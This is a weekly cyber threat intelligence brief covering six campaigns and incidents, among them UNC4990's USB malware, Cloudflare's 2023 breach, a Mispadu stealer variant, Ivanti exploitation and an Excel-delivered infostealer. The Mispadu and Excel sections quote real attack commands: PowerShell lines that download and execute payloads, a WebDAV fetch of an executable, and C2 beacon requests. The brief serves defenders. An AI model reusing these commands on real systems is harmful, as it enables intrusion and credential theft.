Cyber Intel Brief: February 1 – 7, 2024

Infected USB Drives Lead to Backdoor Infection, Spreading, and Follow-on Activity

USB Drive Infection – Malware – Threat Actor – Loader – EMPTYSPACE – Backdoor – QUIETBOARD – Malicious PowerShell Script – UNC4990 – Health Care and Social Assistance – Transportation and Warehousing – Construction

Threat Analysis

A threat actor tracked as UNC4990 has used USB devices to infect targets with a loader dubbed EMPTYSPACE, which deploys the backdoor dubbed QUIETBOARD, capable of spreading through USB/removable drive infection,and arbitrary command execution, cryptocurrency theft through clipboard manipulation, and gathering system information. Based on Mandiant’s research, this campaign has been ongoing since at least 2020. Infections have primarily impacted organizations located in Italy but based in Europe and the US across multiple industries, including Health Care and Social Assistance, Transportation and Warehousing, and Construction. 

Initial infection begins when a target double-clicks a malicious LNK shortcut file on a removable USB device. The naming convention for the LNK file typically consisted of the vendor of the USB device and the storage size in brackets. Sometimes, the drive label was used instead of the vendor name. Upon double-clicking, the LNK file executes the PowerShell script explorer.ps1.

There are multiple iterations of the malicious PowerShell script explorer.ps1, which ultimately downloads and decodes the EMPTYSPACE downloader. Over time the threat actors incrementally changed explorer.ps1. Earliest known scripts fetch a resource from a URL stored in the script, hxxps://lucaespo.altervista[.]org/updater.php?from=USB1, saving it as Runtime Broker.exe a.k.a. EMPTYSPACE in the TEMP directory. Later script versions were updated with an intermediary stage (src.txt) hosted on GutHub and was previously hosted on GitLab.

Starting in late November 2023, the threat actors changed their TTPs by appending an encoded blob to an image contained in the About section of the Ars Technica forum member frncbf2, who became a member on 23 November 2023. This modification of TTPs necessitated the hard-coded URL in explorer.ps1 be changed to the URL of the encoded blob (hxxps://arstechnica[.]com/civis/members/frncbf22.1062014/about/). 

However, as of mid-December 2023, the photo hosted on Ars Technica was removed along with the intermediary payload. Additionally, from mid-2023, the threat actor updated the URL serving EMPTYSPACE to hxxps://evinfeoptasw.dedyn[.]io/updater.php?from=USB1. 

Previous versions of explorer.ps1 employed an encoded blob inserted into a video description uploaded to Vimeo on 5 March 2023, with the URL to this video being hard-coded in explorer.ps1. This video has since been removed from Vimeo. 

EMPTYSPACE is a downloader that uses HTTP to communicate with its command and control (C2) server, downloading and executing an executable payload served by the C2 server. The EMPTYSPACE beacon response is parsed as JSON containing a list of tasks, each specifying a file to download to disk and execute.

Multiple variants of EMPTYSPACE exist, typically named Runtime Broker, written in Node.js, .NET, and Python. The Node.js version ultimately sends an HTTP POST request to hxxps[:]//bobsmith[.]apiworld[.]cf/license.php with a Base64-encoded beacon containing basic host information such as hostname, username, and localtime. The beacon response is parsed as JSON containing a list of tasks, each specifying a file to download to disk and execute. Additionally, the Node.js version may set the registry value HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Node_Run to the executable path and attempt to run as an elevated process. The malware may additionally drop two batch files, execute.bat, and command.bat, to %TEMP% during the process of attempting to run the sample as an elevated process.

The .NET version can download and execute payloads from the command and control (C2) server, restart itself with elevated privileges, delete downloaded payloads, and communicate system information to the C2 server. The configured C2 server for this sample is hxxps://bobsmith.apiworld[.]cf/license.php. 

In at least one incident, this version of EMPTYSPACE relied on additional resources on the host, most likely dropped during the initial infection. These additional resources are bootstrap.pyc, which is a Python-compiled version of EMPTYSPACE with a similar capability of communicating with a list of embedded C2 domains and the QUIETBOARD backdoor. EMPTYSPACE interacts with these files via an intermediary executable, a Python wrapper named “RuntimeBroker .exe” (vs “Runtime Broker.exe”) located in C:\Windows.

There are three known versions of the Python variant (Bootstrap.pyc), each containing essentially the same code but with different domains. The code continuously attempts to reach the URL hxxp://google[.]com/generate_204 with a 30-second timeout. If unsuccessful, it retries after 2 seconds, likely verifying internet connectivity before proceeding. It then iterates over a list of URLs, attempting to send POST requests. Upon successful communication, it attempts to decode the server’s response using Base64 and then deserializes it, and executes the deserialized data. 

QUIETBOARD is a Python-based pre-compiled multi-component backdoor capable of arbitrary command execution, clipboard content manipulation for cryptocurrency theft, USB/removable drive infection, screenshotting, system information gathering, and communication with the C2 server. Additionally, the backdoor can expand and run independent Python-based code/modules. All these capabilities are provided and managed via its various components: start, coronausb, cboard, runservice, executer, info, and connection. There are multiple versions of QUIETBOARD. One earlier version contained only the coronausb component, while a later version had all the modules except for runservice. 

The start module in the malware framework serves to start the other components. The coronausb component monitors and infects USB and removable drives by creating a hidden folder in the attached removable drive, moving existing data into the newly created folder, and creating an LNK shortcut. The shortcut’s name is the drive’s vendor name and the storage size in brackets, or the drive label and the storage size in brackets.

The cboard component acts as a crypto stealer by continuously monitoring and altering the clipboard content. It tries to detect known patterns for crypto wallet addresses and replace them with its own wallet addresses with the intention of stealing crypto from any transaction the victim might conduct.

The info component of QUIETBOARD gathers and assembles various pieces of information about the infected computer, such as generating unique system ID, installation date, system specifications, WiFi SSIDs, BSSID, and the location of the infected system. It then structures this information into a JSON object, used in the runservice component, and communicated back to the C2 server using the connection component.

The QUIETBOARD’s runservice component is primarily meant to dynamically fetch and execute additional Python code from the C2 server (using the executer component) and generate JSON based on information gathered by the info component. The malware then sends the encrypted JSON in a POST request to the C2 server. QUIETBOARD expects to receive Python code in response, which it executes and communicates back the result to the C2 server in a post request, continuing indefinitely until the server responds with data containing a “continue” flag set to False.

The connection component can execute arbitrary Python code received from the C2 server using the executer component, similar to runservice. However, the connection component has the added functionality of either executing the received code synchronously or asynchronously, in a newly generated thread, based on the setting received from the configured C2 server.

Risk & Impact Assessment

The UNC4990 campaign, utilizing the QUIETBOARD backdoor spread through malicious USB devices, poses a multifaceted risk to organizations, particularly those within the targeted sectors of Health Care and Social Assistance, Transportation and Warehousing, and Construction. The capabilities of QUIETBOARD, such as arbitrary command execution, clipboard content manipulation for cryptocurrency theft, USB/removable drive infection, and comprehensive system information gathering, signify a high-risk vector for organizational cybersecurity. Given these capabilities, the risk extends beyond malware infection to encompass espionage, financial theft, and operational disruption. The ability of QUIETBOARD to deploy additional payloads and malware further escalates the risk and could result in data theft and encryption. The use of USB devices as the initial infection vector highlights a significant organizational risk, exploiting the often-overlooked security vulnerabilities associated with removable media.

Should the attack be successful, the potential impacts are various and severe. Data theft and surveillance activities facilitated by QUIETBOARD could lead to the exfiltration of sensitive organizational information, including intellectual property, financial records, and personally identifiable information (PII) of employees or customers. This theft compromises operational security and places the organization at risk of regulatory penalties and reputational damage. Furthermore, the infection of USB and removable drives points to the risk of these drives infecting other systems, both internally and externally, expanding the threat beyond the initial target and complicating remediation efforts. Given these factors, depending on the activity post-infection, the attack is reasonably likely to cause a material impact on the company’s business operations, results of operations, or financial condition, necessitating a prompt and comprehensive response to mitigate these risks.

Source Material: Mandiant, Evolution of UNC4990: Uncovering USB Malware’s Hidden Depths

Details Emerge From Cloudflare’s Thanksgiving 2023 Attack

Okta Breach – Cloudflare Breach – Credential Compromise – Hacking Tool – Sliver Adversary Emulation Framework – Reconnaissance – Information

Threat Analysis

Recently, Cloudflare detailed an attack on their systems that occurred around Thanksgiving in 2023. Cloudflare reported that the threat actors did not impact Cloudflare customer data or systems or Cloudflare services, nor were changes made to their global network.

At 4:22 AM EST on 14 November, the threat actor conducted probing reconnaissance activities, ultimately gaining access at 11:28 AM EST on 15 November to their self-hosted Atlassian Confluence and Jira using a stolen Moveworks service token, a Smartsheet service account, a Bitbucket service account, and a service account to an AWS environment from an Okta compromise in October 2023 that Cloudflare failed to rotate to gain initial access. 

Additionally, the threat actor accessed an AWS environment used to power the Cloudflare Apps marketplace. Cloudflare segmented this environment, and it does not have access to Cloudflare’s global networks or customer data. Cloudflare has since revoked this account and validated the integrity of the environment.

At 9:36 AM EST on 16 November, the threat actor used the Smartsheet account to create an Atlassian account, adding this user to several groups within Atlassian so that they’d have persistent access to the Atlassian environment should the Smartsheet service account be removed.

At some point on 16 November, the threat actor also searched through Confluence, accessing 36 Jira tickets about vulnerability management, secret rotation, MFA bypass, network access, and Cloudflare’s response to the Okta incident, and 202 wiki pages for things like remote access, secret, client-secret, openconnect, cloudflared, and token.

The threat actors returned on 22 November at 9:18 AM EST to establish persistent access to the Atlassian server by successfully installing the Sliver Adversary Emulation Framework using ScriptRunner for Jira. They unsuccessfully attempted to access a console server that would have provided access to a data center that Cloudflare had not yet put into production.

Over the next day, 23 November, the threat actor viewed 120 code repositories, using the Atlassian Bitbucket git archive feature on 76 repositories to download them to the Atlassian server. However, Cloudflare could not confirm whether or not the threat actor had exfiltrated the repositories.

The 76 source code repositories were almost all related to how backups work, the configuration and management of Cloudflare’s global network, how Cloudflare manages identities and remote access, and their use of Terraform and Kubernetes—however, a small number of the repositories contained encrypted secrets, which Cloudflare rotated immediately. 

In response, Cloudflare initiated incident response activities and deactivated the Smartsheet service account and the user account created by the threat actor. They also removed Sliver and established firewall rules to block the threat actor’s known IP addresses. The threat actor tried to access various other systems throughout Cloudflare’s response but failed. The last evidence of threat activity occurred on 24 November at 5:44 AM.

The incident response activities focused on strengthening, validating, and remediating any control in their environment to ensure they are secure against future intrusion and to validate that the threat actor could not access our environment. Incident response activities included rotating every production credential, physically segmenting testing and staging systems, performing forensic triages on 4,893 systems, reimaging and rebooting every machine in our global network, including all the systems the threat actor accessed, and all Atlassian products (Jira, Confluence, and Bitbucket). 

Cloudflare also looked for software packages that hadn’t been updated, user accounts that might have been created, and unused active employee accounts, searching for secrets that might have been left in Jira tickets or source code, examined and deleted all HAR files uploaded to the Confluence server in case they contained tokens of any sort. Whenever in doubt, they assumed the worst and made changes to ensure anything the threat actor could access would no longer be in use and, therefore, would no longer be valuable to them.

Risk & Impact Assessment

The Cloudflare incident underscores the organizational risks associated with threat actors using compromised credentials and leveraging these accounts for unauthorized access, highlighting the paramount importance of robust cybersecurity measures. The failure to rotate compromised credentials post a third-party breach, like Okta, exemplifies a critical vulnerability, emphasizing the need for diligent security hygiene and proactive threat detection mechanisms. It’s pivotal to recognize the potential versatility afforded to the threat actors. While they opted to deploy a hacking tool (Sliver), the ability to abstain from deploying any payloads, relying solely on compromised accounts, signifies a greater risk. This adaptability amplifies the organizational risk and underscores the complexity of defending against actors who can navigate environments using only compromised accounts, making detection and mitigation increasingly challenging.

Should threat actors successfully use compromised accounts, the potential consequences are multifaceted. Unauthorized access could lead to significant data access and theft, including sensitive customer information, intellectual property, and internal operational details, potentially causing a material impact on business operations. The likelihood of such outcomes necessitates comprehensive risk management strategies to mitigate threats and minimize operational, reputational, and financial damage. This incident is a cautionary tale for organizations to enhance security protocols and incident response capabilities to safeguard against similar attacks.

Source Material: Cloudflare, Thanksgiving 2023 security incident

Suspected New Variant of Mispadu Stealer Discovered

Malware – Phishing – Vulnerability Exploitation – Mispadu Stealer – Infostealer – Phishing Email – Targeted Credential Theft – Microsoft Defender SmartScreen CVE-2023-36025 – Industries/All

Threat Analysis

In November 2023, Unit 42 discovered several suspected new samples of the Mispadu Stealer stemming from their investigation of a command and control (C2) server used in a campaign delivering a ZIP archive containing a malicious .url file. This URL file exploited the SmartScreen Vulnerability CVE-2023-36025 to deliver a malicious executable binary.

Unit 42’s analysis focuses on the newly discovered sample with the MD5 hash 723df0296951abd2aeed01361cec6b0d. While it’s unknown how this sample is delivered, upon initial execution, this sample queries the difference in minutes between the local time zone and UTC. The stealer then calculates the difference by subtracting 300 and checking to see if the resulting value exceeds 180. If the value exceeds 180, the stealer will immediately exit.

The sample then identifies the %TEMP% directory on the victim host, which it will use for temporary file storage during the remainder of its execution. After it performs this action, the sample identifies the version of Windows the victim host is running and performs its initial HTTP/HTTPS check-in to the remote C2 server.

The sample will perform an HTTP or HTTPS GET request based on the version of Microsoft Windows the host is running, sending an HTTP request if the victim machine runs Windows 7 or older or an HTTPS request. An example of this request is shown below:

GET /4g3031ar0/cb6y1dh/it.php?f=2&w=Windows%2010 HTTP/1.1
Host: trilvok.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

In the example above, the w= parameter in the GET header line references the Windows version running on the victim host.

After it performs this initial check-in and the command and control (C2) server receives a successful response, the sample proceeds to interact with the victim’s Microsoft Edge or Google Chrome browser history databases via SQLite, copying the browser history databases to the %TEMP% directory. The sample then executes a SQLite query against the copied files to identify URLs visited after 29 August 2023, suggesting the attacks occurred after this date.

The sample then checks the identified URLs against a target list, leveraging a prebuilt list of SHA256 hashes. The threat actor built this list from hashes from targeted URLs and prepended a set hash value to each value. 

Based on Unit 42’s analysis, this sample targets 15 URLs. While they could not identify all of the URLs, they were able to determine the threat actors targeted the following URLs, where ?? represents unidentified SHA256 hashes. These URLs align with financial institutions, financial exchanges, and organizations aligned with cryptocurrency. Four URLs are intended for users in Mexico based on their .mx top-level domain. 

• www.??.??.hsbc[.]com[.]mx
• www1.secure.hsbcnet[.]com
• bancadigital.monex[.]com[.]mx
• nixe.ixe[.]com[.]mx
• empresas.bbvanet[.]com[.]mx

If the sample identifies any URLs matching the target list, it uploads data via an HTTP/S POST request. An example of this request is shown below:

POST /4g3031ar0/cb6y1dh/it.php?v1=1033&v2=1033&v4=Windows%2010&v5=User&v6=X64
Host: trilivok.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

This request has several additional URI parameters. The V1 variable identifies the user’s UI language. The V2 variable identifies the keyboard layout. V4 denotes the operating system. V5 identifies the process permissions (user/admin). Finally, the V6 variable denotes the CPU architecture (X64/X86).

After it has successfully uploaded the data, the sample sends the following final HTTP/S GET request:

GET /4g3031ar0/cb6y1dh/it.php?f=9&w=Windows%2010 HTTP/1.1
Host: trilivok.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

This request differs from the initial request, with the f parameter set to a value of 9 instead of 2.

Unit 42 observed similarities between this sample and previous Mispadu Stealer samples discovered in March and August 2023. These similarities underpin the key assumption that recently compiled binaries are a new version of the Mispadu Stealer. 

Mispadu Stealer is an infostealer first reported by ESET in November 2019 that employs a multistage infection chain containing various techniques that its developers are constantly changing. Campaigns typically focus on Latin America (LATAM) countries and Spanish- or Portuguese-speaking users. The typical distribution method for Mispadu Stealer involves spam campaigns, where victims receive malicious emails containing a .zip file housing a deceptive URL. 

In addition to credential theft from browsers, Mispadu Stealer can take screenshots, simulate mouse and keyboard actions, and capture keystrokes. It can update itself by downloading and executing a Visual Basic Script (VBS) file. Mispadu Stealer also monitors the clipboard’s content and tries to replace potential Bitcoin wallets with its own.

Based on Unit 42’s telemetry, Mispadu Stealer has been detected across various regions, with Mexico being the most prominent, followed by France, the United States, Spain, Switzerland, Germany, Belgium, and Argentina. This stealer is spreading rapidly, reaching other European regions that Unit 42 hasn’t seen targeted in previous campaigns.

The ZIP archive that led Unit 42 to discover the suspected new variant of Mispadu Stealer was named RFC.Online.Melendez.1981.d9f.zip and contained a malicious .url file named Paolalizbeth.Melendez.1209[.]url that exploited the SmartScreen Vulnerability CVE-2023-36025. 

This .url file executed the following command to retrieve and execute a malicious binary named 2456719228.exe:

file[:]\\24.199.98[.]128@80\expediente38\1477606991\2456719228.exe

This .url file navigates a Universal Naming Convention (UNC) path, prompting the system to use the protocol based on network shares. While Server Message Block (SMB) is typically the default, the system would attempt to use WebDAV if SMB is not enabled or if an HTTP port (@80) is specified within the UNC path. In such scenarios, the operating system will initiate a request through the rundll32.exe utility. An example of this request is shown below:

Rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 24.199.98[.]128@80 hxxp://24.199.98[.]128/digital68/5191717076/3825427674.exe

Risk & Impact Assessment

Recent suspected Mispadu Stealer samples, with their capabilities and targeted approach, present a significant organizational risk, especially for organizations of the financial institutions targeted. Its mechanisms for credential theft of these targeted websites put sensitive financial and personal information at high risk. Given the threat actors’ ability to exploit the Windows SmartScreen vulnerability (CVE-2023-36025) and steal credentials, the stealer can lead to substantial financial losses and compromise customer trust.

If successful, an attack by this variant could result in extensive data theft, including financial institution credentials, information, and personal identifiers, leading to financial fraud and identity theft. Such activities are likely, considering the stealer’s proven capabilities and targeted nature. A successful infection could materially impact a company’s operations, primarily if the organization uses any of the known targeted websites, potentially leading to significant financial repercussions, operational disruptions, and long-term reputational damage. The risk is amplified for organizations within the stealer’s geographical focus but is not limited to these regions, indicating a need for broad vigilance.

Source Material: Palo Alto Unit 42, Exploring the Latest Mispadu Stealer

Another Ivanti Connect Secure and Policy Secure Vulnerability (CVE-2024-21893) Exploited

Vulnerability Exploitation – Threat Actor – Malware – Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA CVE-2024-21893 – UNC5221 – Web Shell – BUSHWALK – Industries/All

Threat Analysis

The ShadowServer Foundation has observed threat actors exploiting a recently disclosed critical vulnerability impacting Ivanti Connect Secure and Policy Secure, tracked as CVE-2024-21893 (CVSS score: 8.2), within hours of Rapid7’s technical analysis. After Rapid7’s publication, exploitation attempts increased significantly, peaking on 4 February and slowly dropping afterward. The vulnerability allows unauthenticated threat actors to access certain restricted resources. 

Rapid7’s technical analysis involves chaining CVE-2024-21893 with CVE-2024-21887, a previously patched command injection flaw, to achieve unauthenticated remote code execution. In their publication, Rapid7 states that UNC5221 developed a technique to bypass Ivanti’s initial mitigation on 10 January that led to deploying a custom webshell tracked as BUSHWALK, as disclosed by Mandiant, which Deepwatch covered in the Jan 25-31 Cyber Intel Brief pdf report titled “New Details Emerge in UNC5221’s Exploitation of Ivanti Connect Secure VPN and Ivanti Policy Secure”, as well as a customer advisory titled “Ivanti Connect Secure VPN Appliance Vulnerabilities (CVE-2023-46805 & CVE-2024-21887) Exploited to Deploy Webshells, Collect Credentials, and Perform Reconnaissance.” It is now known that this bypass technique exploited CVE-2024-21893.

Between February 3 and 5, according to the Shadowserver Foundation, nearly 170 exploitation attempts targeting the vulnerability have been recorded from more than 170 IP addresses. Initial exploitation attempts used ‘/dana-na/auth/saml-logout.cgi’. Post Rapid7’s publication, threat actors used ‘/dana-ws/saml20.ws’ in their exploitation attempts, including reverse shell attempts and other checks. 

The vulnerability affects Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA. Ivanti has released a fix for Connect Secure versions 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1 and 22.5R2.2, Policy Secure version 22.5R1.1, and ZTA version 22.6R1.3. Ivanti will release patches for the remaining supported versions on a staggered schedule. For organizations unable to update their instances at this time, a new mitigation is available for download. If customers have applied the patch, they do not need to apply the mitigation.

Due to the severity of this and other vulnerabilities impacting Ivanti Connect Secure and Policy Secure solutions, CISA required all government agencies to disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure solution products from agency networks. Then agencies must continue threat hunting on any systems connected to—or recently connected to—the affected Ivanti device. Monitor the authentication or identity management services that could be exposed. Isolate the systems from any enterprise resources to the greatest degree possible. Finally, continue to audit privilege level access accounts.

Before an agency can bring a product back into service, they must perform the following actions:

• Export configuration settings.
• Complete a factory reset per Ivanti’s instructions.
• Rebuild the device per Ivanti’s instructions AND upgrade to a supported software version through Ivanti’s download portal (there is no cost to upgrade).
• Reimport the configuration.
• If mitigation XML files were applied, review the Ivanti KB and customer portal for directions on how to remove the mitigations after upgrading.
• Revoke and reissue any connected or exposed certificates, keys, and passwords.
• Reset the admin enable password.
• Reset stored application programming interface (API) keys.
• Reset the password of any local user defined on the gateway, including service accounts used for auth server configuration(s).

Risk & Impact Assessment

While these exploitation attempts have likely centered on identifying vulnerable instances, the number of events suggests that threat actors will identify vulnerable systems for exploitation, posing significant risks to organizations. Successful exploitation, if chained with CVE-2024-21887, could result in remote code execution to facilitate post-exploitation activity, which, as observed, resulted in the deployment of web shells for persistent access. This activity could affect critical operational functionalities, resulting in data exfiltration, operational downtime, and financial losses. Additionally, the reputational damage from such attacks could lead to a loss of customer trust and potential legal repercussions, especially for organizations subject to stringent data protection regulations.

The CVE-2024-21893 vulnerability poses a significant risk of exploitation, which can cause severe concerns for any company’s operations. As Ivanti Connect Secure and Policy Secure are widely used, many businesses could be vulnerable to exploitation. If threat actors gain access to sensitive data or compromise it in any way, companies may face immediate operational disruptions and long-term impacts on their financial condition. The costs associated with remediation, legal liabilities, and loss of business due to customer mistrust could be substantial. Furthermore, if cybercriminals successfully chain the vulnerability with CVE-2024-21887, the implications could escalate rapidly, giving the potential for more impactful activity, like ransomware. Therefore, companies must be aware of these risks, as exploiting this vulnerability can significantly impact business continuity, operational integrity, and financial stability.

Source Material: ShadowServer Foundation on X,
Rapid7, CISA, Deepwatch Customer Advisory, and Deepwatch Cyber Intel Brief Jan 25-31.

Navigating the Landscape of Valid Account Abuse

Phishing – Credential Theft – Valid Account Abuse – Brute Force and Password Spray Attacks – Infostealers – Insider Threat – Password Spray Attack – Social Engineering – Industries/All

Threat Analysis

In 2023, Cisco Talos observed the use of valid accounts as the second-most common MITRE ATT&CK technique, and over 1/4th of all Cisco Talos Incident Response engagements involved the use of valid accounts. Due to this trend, Cisco Talos investigated how threat actors obtain and use these valid accounts. 

Threat actors target valid accounts because they are challenging to defend against malicious use. Finding the initial point of misuse is especially difficult if users are coerced to share their account details or conduct malicious activities.

Their findings reveal that this trend is driven by a few key factors, including the belief that most cyberattacks will come from “the outside in” through vulnerability exploitation and that stolen credentials are for sale on the dark web. Finally, threat actors are following the increasing trend of users accessing more systems remotely and from their own devices, and cloud solutions are becoming increasingly commonplace.

The tactics to obtain these valid accounts that Cisco Talos frequently encounter include credentials stolen from password stores, infostealers, credentials stolen from fake login portals via phishing campaigns, stealing or forging Kerberos tickets, dormant accounts, Brute Force and Password Spray attacks, and QR code phishing.

When users are allowed to store passwords on various applications or web browsers, adversaries will target these, searching across common password storage locations to look for passwords. Threat actors have used this technique for many years, but the rate at which this still happens highlights the need for organizations and individuals to use password managers, not the built-in ones in web browsers. Infostealers are just one type of malware that targets these password stores.

Threat actors often impersonate commonly used login portals, such as Microsoft Office 365. These login portals look legitimate at first glance but contain malicious code designed to capture user account details. To direct targets to these login portals, threat actors may send users a phishing email, or users may be redirected to these portals when visiting a malicious website.

According to Oort from 2022, dormant accounts, which may employ weak or no form of multifactor authentication, represent almost a fourth of the average company’s accounts, which are targeted, on average, over 500 times per month. Threat actors look for accounts that are not used regularly but still have network access, like an employee or a temporary contractor who left the company but whose access was never removed.

If a threat actor has part of the login details, like an email address, which are easy to obtain, they may attempt a brute force attack to try and guess the password. These attempts may not necessarily be entirely random guesses, as threat actors may use the knowledge gained from open-source research or other attacks or leaks. Brute Force attacks highlight organizations’ need to limit the number of consecutive failed logon attempts. A variation of a Brute Force attack is Password Spraying, where threat actors attempt passwords obtained from information leaks, hoping users reuse these passwords across various services, reducing the chance of detection and password blocking. 

Finally, there has been a recent rise in QR code phishing to gain user credentials. In a recent Cisco Talos incident response engagement, a threat actor sent a phishing email to the company email of several employees, which contained a PDF with a malicious QR code. Some employees used their smartphones to scan the code, enabling the threat actor to obtain credentials and log in to the organization’s system. Due to a lack of logs on the smartphones, the activity that occurred after the users scanned the QR code is unknown. One possibility is that passwords were saved in an unpatched browser. 

Many identity-type attacks seek to manipulate or coerce the user themselves into divulging their credentials. Phishing emails are one of the most common ways adversaries compromise victims. In the last year alone, 25% of the initial access vectors identified in Talos Incident Response engagements involved phishing. This observation is consistent with U.S. government findings, with the FBI noting that phishing was the top incident reported to its Internet Crime Complaint Center (IC3) in 2022.

Most individuals think phishing/social engineering involves clicking on a malicious link or attachment to trigger malware. However, other aspects can include manipulating users to act on the threat actors’ behalf. These are known as insider attacks.

While there are still cases of traditional insider threats, i.e., employees who deliberately cause damage to their organization’s network, either for financial gain or frustrations with the organization itself. However, another category of insider threats is the “unwitting asset.”

In these cases, threat actors use social engineering to manipulate users to act on their behalf. One example is Scattered Spider’s targeting of help desk employees, impersonating an employee seeking to rectify an issue, such as the inability to log in to their account. By calling targets, the threat actor increases their chances of persuading the target to perform the requested action, which includes logging into devices and reconfiguring something or revealing essential account details. 

Risk & Impact Assessment

The abuse of valid accounts presents significant organizational risks, primarily because it allows threat actors to bypass traditional security measures, thus blending in with legitimate user activities. This attack vector complicates the detection of unauthorized access and malicious activities within an organization’s network. The risk extends beyond unauthorized access, extending to the potential for persistent access and data theft and the deployment of ransomware and other disruptive malware.

Should an attack leveraging valid accounts succeed, the impact could be severe. These incidents could severely affect a company’s business operations, leading to operational downtime, loss of customer trust, legal repercussions, and significant financial losses. The likelihood of such outcomes underscores the need for organizations to reassess their security posture, emphasizing the protection of user credentials and the detection of their misuse to mitigate potential material impacts effectively.

Source Material: Cisco Talos, How are user credentials stolen and used by threat actors?

Threat Actors Still Using Microsoft Excel Files to Deliver Malware

Malware – Phishing – Infostealer – PowerShell Execution – Telegram Bot – Vietnamese Threat Group – Multi-stage Infection Chain – Industries/All

Threat Analysis

In January 2024, FortiGuard Labs obtained an Excel document distributing an infostealer. From the fingerprints in this attack, it is related to a Vietnamese-based group that was first reported in August 2023 and again in September. The attack employs a multi-stage infection chain downloading and executing simple downloaders before the deployment of the infostealer. 

A high-level overview of the infection is as follows:

1. Malicious Excel file downloads WindowsUpdate.bat from filebin.net
2. WindowsUpdate.bat downloads test.vbs from gitlab.com
3. test.vbs downloads bypass.vps, document.zip, and script.py from gittlab.com 
4. Collected information is archived in a ZIP file and sent to the actor’s Telegram bot.

The first stage of this attack is an Excel document with a VBA script that executes the following PowerShell command to download 3-obf.bat from filebin.net, renames it as WindowsUpdate.bat, and executes it.

cmd /c powershell.exe -WindowsStyle hidden -Command New-Item -ItemType Directory -Force -Path C:\\Downloads; Invoke-WebRequest -Uri https://filebin[.]net/o3twbo3yoqhndd55/3-obf.bat -OutFile C:\\Downloads\\WindowsUpdate.bat; Start-Process -FilePath C:\\Downloads\\WindowsUpdate.bat

Windows Update.bat is obfuscated; the malicious part of the original code executes the following PowerShell commands that download and execute test.vbs from GitLab.

powershell.exe -WindowsStyle hidden -Command “New-Item -ItemType Directory -Force -Path ‘C:\Downloads’; Invoke-WebRequest -Uri {URL} -OutFile ‘C:\Downloads\test.vbs’”
powershell.exe -WindowsStyle hidden -Command “& {Start-Process ‘wscript.exe’ -ArgumentList ‘C:\Downloads\test.vbs’ -WindowsStyle Hidden

test.vbs downloads three files from GitLab:

• script.py: Information stealer.
• document.zip: Python 3.11 with libraries for script.py.
• bypass.vbs: Executes script.py with the downloaded Python.

script.py, the infostealer, is obfuscated by PyObfuscate, which requires extra modules to be executed properly. document.zip, which contains these additional modules, is downloaded.

In addition, test.vbs creates a value named “WinUpdater” within the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to automatically run bypass.vbs when the victim logs in.

script.py collects browsers’ cookies and login data from a wide range of browsers, such as Chrome and Edge, to the Cốc Cốc browser, which is focused on the Vietnamese market.

The info stealer then collects data and compresses it into a zip file. It is then sent to the threat actor’s telegram bot with a message containing the date, victim’s country, IP address, language, password count, and cookie count.

Apart from the files downloaded from GitLab, several additional files sharing commonalities with this campaign were also uploaded, for example, obfuscated batch files and VBScript files executing PowerShell code whose code is identical to WindowsUpdate.bat and test.vbs. From those files, FortiGuard identified additional GitHub repositories hosting malicious files, including XWorm, VenomRat, RedLine, etc.

Risk & Impact Assessment

The organizational risks this infostealer campaign poses, as distributed through a malicious Excel document, could be significant. This campaign, attributed to a Vietnamese-based threat group, underscores their credential theft objective, likely for financial gain, by selling the credentials to other threat actors. However, this group’s objective may be to gain initial access for another group, like a nation-state threat actor. Furthermore, the use of legitimate internet services, like GitHub and GitLab, for hosting malicious payloads is increasingly becoming more prevalent, complicating efforts to distinguish between benign and malicious traffic in organizational networks where these services are used.

The multi-stage infection chain leverages obfuscation and GitLab to bypass detection mechanisms, increasing the likelihood of successful penetration into organizational networks. Should the attack succeed, potential consequences would initially include credential theft. However, if the threat actors’ intention is for financial gain, further compromise is possible, including the abuse of valid accounts and theft and encryption of sensitive data. This unauthorized access can negatively impact a company’s operational integrity, potentially compromising business operations and financial conditions.

Source Material: Fortinet, Python Info-stealer Distributed by Malicious Excel Document